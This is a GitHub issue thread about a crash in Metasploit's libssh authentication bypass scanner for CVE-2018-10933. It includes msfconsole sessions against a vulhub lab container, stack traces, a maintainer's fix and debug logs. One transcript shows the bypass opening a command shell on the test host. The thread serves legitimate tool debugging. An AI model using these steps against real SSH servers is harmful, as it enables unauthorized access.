gardnerapp
commented
1 year ago I was able to reproduce this error on an Ubuntu system running Ruby 2.7.0, however when I use ruby 3.0.5 the error does not occur and the module works fine.
Closed bmilliron67 closed 1 year ago
gardnerapp
commented
1 year ago I was able to reproduce this error on an Ubuntu system running Ruby 2.7.0, however when I use ruby 3.0.5 the error does not occur and the module works fine.
adfoster-r7
commented
1 year ago Thanks for the additional details :+1: It looks like the user was running with Ruby 3.x as well:
Framework: 6.3.24-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]Is your target vulnerable to the exploit?
zhanglinqiang
commented
1 year ago I also encountered the same problem. vulnerable target env from vulhub master.
version: '2'
services:
sshd:
image: vulhub/libssh:0.8.1
ports:
- "2222:22"
- "9876:9876"From Tag 6.3.13 build docker image, enter msfconsole:
msf6 > search CVE-2018-10933
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.65.106.29
rhosts => 10.65.106.29
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set port 2222
[error] Unknown datastore option: port. Did you mean RPORT?
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[info] 10.65.106.29:2222 - Attempting authentication bypass
[error] Auxiliary failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[error] Call stack:
[error] /usr/src/metasploit-framework/lib/net/ssh/command_stream.rb:43:in `initialize'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `new'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `run_host'
[error] /usr/src/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'
[error] /usr/src/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[info] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.3.13-dev
Console : 6.3.13-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > But old version: 6.1.5-dev worked well.
msf6 > search CVE-2018-10933
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.65.106.29
rhosts => 10.65.106.29
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 10.65.106.29:2222 - Attempting authentication bypass
[*] Command shell session 1 opened (10.65.106.29:40503 -> 10.65.106.29:2222) at 2022-10-12 15:28:42 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell libssh Authentication Bypass 10.65.106.29:40503 -> 10.65.1
Scanner (SSH-2.0-libssh_0.8 06.29:2222 (10.65.106.29)
.1)
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.1.5-dev
Console : 6.1.5-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >
This error also occurred on source tag 6.3.25-dev with ruby 3.x.
bash-5.1# ./msfconsole
msf6 > search libssh_auth
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > use 0
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2022
rport => 2022
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 10.7.181.156
rhosts => 10.7.181.156
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[info] 10.7.181.156:2022 - Attempting authentication bypass
[error] Auxiliary failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[error] Call stack:
[error] /usr/src/metasploit-framework/lib/net/ssh/command_stream.rb:43:in `initialize'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `new'
[error] /usr/src/metasploit-framework/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:121:in `run_host'
[error] /usr/src/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'
[error] /usr/src/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[info] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > ruby --version
[info] exec: ruby --version
ruby 3.0.5p211 (2022-11-24 revision ba5cf0f7c5) [x86_64-linux-musl]
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > version
Framework: 6.3.25-dev
Console : 6.3.25-dev
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > @zhanglinqiang Thanks for the steps for reproducing the error :+1:
I've put up a pull request for this here: https://github.com/rapid7/metasploit-framework/pull/18203
I can verify the Execute action works as expected now, and there's no longer an error - but on my environment the Shell action isn't stable. Let me know if that's also true for your setup and we can dig deeper if so
zhanglinqiang
commented
1 year ago Thanks for your reply. With your PR, get shell failed on my env. As I mentioned before, 6.1.5-dev worked, So the vulnerable env is right.
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 10.65.106.29:2222 - Attempting authentication bypass
[-] Command shell session 8 is not valid and will be closed
[*] 10.65.106.29 - Command shell session 8 closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) >framework log:
leen@leenPC:~/.msf4/logs$ tail -f framework.log
[07/21/2023 12:05:34] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (8)
[07/21/2023 12:05:39] [d(0)] core: Session 8 failed to respond to an echo command
I've updated the module to no longer crash; The action should be set depending on the target's vulnerability, i.e. setting the action to Execute vs Shell
Steps to reproduce
How'd you do it?
Expected behavior
shell or at least not crash
Current behavior
stacktrace
Metasploit version
Framework: 6.3.24-dev- Console : 6.3.24-dev-
Additional Information
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
``` [framework/database] [framework/database/local-https-data-service] url=[Filtered] cert=[Filtered] skip_verify=[Filtered] api_token=[Filtered] [framework/ui/console] ActiveModule=auxiliary/scanner/ssh/libssh_auth_bypass [scanner/ssh/libssh_auth_bypass] RHOSTS=x.x.x.x CHECK_BANNER=false VERBOSE=true loglevel=3 WORKSPACE= RPORT=22 SSH_IDENT=SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 SSH_TIMEOUT=10 SSH_DEBUG=false THREADS=1 ShowProgress=true ShowProgressPercent=10 CreateSession=true InitialAutoRunScript= AutoRunScript= CommandShellCleanupCommand= AutoVerifySession=true CMD= SPAWN_PTY=false ```Database Configuration
The database contains the following information:
Collapse
``` Session Type: Connected to msf. Connection type: postgresql. ``` | ID | Hosts | Vulnerabilities | Notes | Services | |-:|-:|-:|-:|-:| | 1 **(Current)** | 2 | 2 | 0 | 1 | | **Total (1)** | **2** | **2** | **0** | **1** |History
The following commands were ran during the session and before this issue occurred:
Collapse
``` 35 use 0 36 search libssh 37 use auxiliary/scanner/ssh/libssh_auth_bypass 38 set rhosts x.x.x.x 39 set check_banner false 40 set verbose true 41 show options 42 run 43 version 44 set loglevel 3 45 run 46 debug ```Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
``` [07/05/2023 22:14:22] [e(0)] core: Thread Exception: ScannerHost(scanner/ssh/libssh_auth_bypass)-x.x.x.x critical=false source: /opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:118:in `block in run' /opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:101:in `loop' /opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/scanner.rb:101:in `run' /opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:178:in `job_run_proc' /opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:85:in `run_simple' /opt/metasploit-framework/embedded/framework/lib/msf/base/simple/auxiliary.rb:96:in `run_simple' /opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/auxiliary.rb:69:in `cmd_run' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:168:in `run' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start' /opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
``` No matching patterns were found in msf-ws.log. ```Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
``` /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:168:in `run' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start' /opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
``` 2022-08-08 20:52:01 +0000 Writing PID to /home/foresitelabs/.msf4/msf-ws.pid 2022-08-08 20:52:06 +0000 Thin web server (v1.8.1 codename Infinite Smoothie) 2022-08-08 20:52:06 +0000 Maximum connections set to 1024 2022-08-08 20:52:06 +0000 Listening on localhost:5443, CTRL+C to stop 2023-03-09 16:42:46 +0000 Restarting ... 2023-03-09 16:42:47 +0000 Writing PID to /home/foresitelabs/.msf4/msf-ws.pid 2023-03-09 16:42:59 +0000 Thin web server (v1.8.1 codename Infinite Smoothie) 2023-03-09 16:42:59 +0000 Maximum connections set to 1024 2023-03-09 16:42:59 +0000 Listening on localhost:5443, CTRL+C to stop ```Version/Install
The versions and install method of your Metasploit setup:
Collapse
``` Framework: 6.3.24-dev- Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux] OpenSSL: OpenSSL 1.1.1m 14 Dec 2021 Install Root: /opt/metasploit-framework/embedded/framework Session Type: Connected to msf. Connection type: postgresql. Install Method: Omnibus Installer ```